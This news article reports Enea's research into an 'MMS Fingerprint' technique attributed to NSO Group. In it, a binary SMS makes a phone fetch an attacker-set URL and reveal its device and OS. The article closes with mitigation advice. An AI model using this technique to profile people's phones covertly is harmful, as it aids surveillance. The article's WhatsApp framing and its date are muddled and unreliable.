NSO Group, an Israeli spyware firm, is suspected of exploiting a novel “MMS Fingerprint” attack to target unsuspected users on WhatsApp, exposing their device information without needing user interaction.
Swedish telecom security firm Enea reports that the Israeli NSO Group, targeted journalists, human rights activists, lawyers, and government officials with a novel MMS Fingerprint attack by exploiting a vulnerability in WhatsApp.
The report that the company shared with Hackread.com on Thursday 15, 2023, WhatsApp discovered a vulnerability in its system in May 2019, allowing attackers to install Pegasus spyware on users’ devices. The flaw was then exploited to target government officials and activists globally. WhatsApp sued NSO Group for this exploitation, but appeals failed in the US appeal court and Supreme Court.
The attack, reportedly used by NSO Group, was discovered in a contract between the Israeli agency’s reseller and the telecom regulator of Ghana, which can be viewed in lawsuit documents here (PDF).
Enea launched an investigation to find out how an MMS fingerprint attack occurs. They discovered that it can reveal the target device and OS version without user interaction by sending an MMS.
The MMS UserAgent, a string that identifies the OS and device (such as a Samsung phone running Android), can be used by malicious actors to exploit vulnerabilities, tailor malicious payloads, or craft phishing campaigns.
Surveillance companies often request device information, but UserAgent may be more useful than IMEI. It’s important to note that MMS UserAgent is different from browser UserAgent, which has privacy concerns and changes.
The problem, according to Enea’s report, was not in the Android, Blackberry, or iOS devices but in the complex, multi-stage MMS flow process. The MMS flow examination suggested this was launched possibly through another method involving binary SMS.
For your information, MMS standards designers worked on a way to notify recipient devices of an MMS waiting for them without requiring them to be connected to the data channel. MM1_notification.REQ uses SMS, a binary SMS (WSP Push), to notify the recipient MMS device’s user agent that an MMS message is waiting for retrieval.
The subsequent MM1_retrieve.REQ is an HTTP GET to the URL address, which includes user device information, which was suspected to be leaked and potentially lifted the MMS fingerprint.
Researchers obtained sample SIM cards from a randomly selected Western European operator and successfully sent MM1_notification.REQs (binary SMSs), setting the content location to a URL controlled by their web server.
The target device automatically accessed the URL, exposing its UserAgent and x-wap-profile fields. A Wireshark decode of the MMS notification and GET revealed how an attacker would execute an “MMS Fingerprint” attack, demonstrating it was possible in real life.
The attack highlights the ongoing threat to the mobile ecosystem. Binary SMS attacks have been steadily reported over the last 20 years, highlighting the need for mobile operators to evaluate their protection against such threats.
To prevent the attack, disabling MMS auto-retrieval on mobile devices can help, but some devices may not allow modification. On the network side, filtering Binary SMS/MM1_notification messages can be effective. If a malicious binary SMS message is received, it is essential to prevent messages from connecting to attacker-controlled IP addresses.
RELATED TOPICS
- Israeli spyware hacked phones of journalists globally
- iShutdown Tool Detects Pegasus Spyware on iOS Devices
- Fake WhatsApp clone aim at crypto on Android and Windows
- WhatsApp OTP Scam Allows Scammers to Hijack Your Account
- iPhones of State Dept officials hacked by NSO Pegasus spyware